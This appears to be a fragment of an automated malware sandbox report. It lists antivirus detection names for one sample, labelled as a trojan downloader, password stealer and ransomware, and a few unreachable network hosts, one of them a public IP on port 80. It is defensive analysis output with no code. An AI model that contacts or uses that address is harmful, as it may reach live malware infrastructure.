Tencent Win32.Trojan-downloader.Agent.Pdct
Ad-Aware Trojan.GenericKD.37711236
Emsisoft Trojan.GenericKD.37711236 (B)
McAfee-GW-Edition GenericRXMT-VE!477B1B2A2779
Sophos Mal/Generic-S
Ikarus Trojan-Downloader.Win32.Agent
Webroot W32.Malware.Gen
Avira TR/Dldr.Agent.njxyo
Gridinsoft Malware.Win32.GenericMC.cc
Microsoft Trojan:Script/Phonzy.A!ml
ViRobot Trojan.Win32.Z.Agent.394240.MC
GData Trojan.GenericKD.37711236
AhnLab-V3 Malware/Win.VE.C4670703
McAfee GenericRXMT-VE!477B1B2A2779
MAX malware (ai score=82)
VBA32 BScope.TrojanRansom.FileCryptor
Malwarebytes Spyware.PasswordStealer
TrendMicro-HouseCall TROJ_GEN.R002H0CJ321
Rising Downloader.Agent!1.D93C (CLASSIC)
SentinelOne Static AI - Malicious PE
eGambit Unsafe.AI_Score_68%
Fortinet W32/Agent.FWC!tr
AVG Win32:Trojan-gen
Panda Trj/Downloader.AAE
CrowdStrike win/malicious_confidence_60% (D)
dead_host 2.56.59.42:80
dead_host 192.168.56.101:49340
dead_host 192.168.56.101:49248
dead_host 192.168.56.101:49311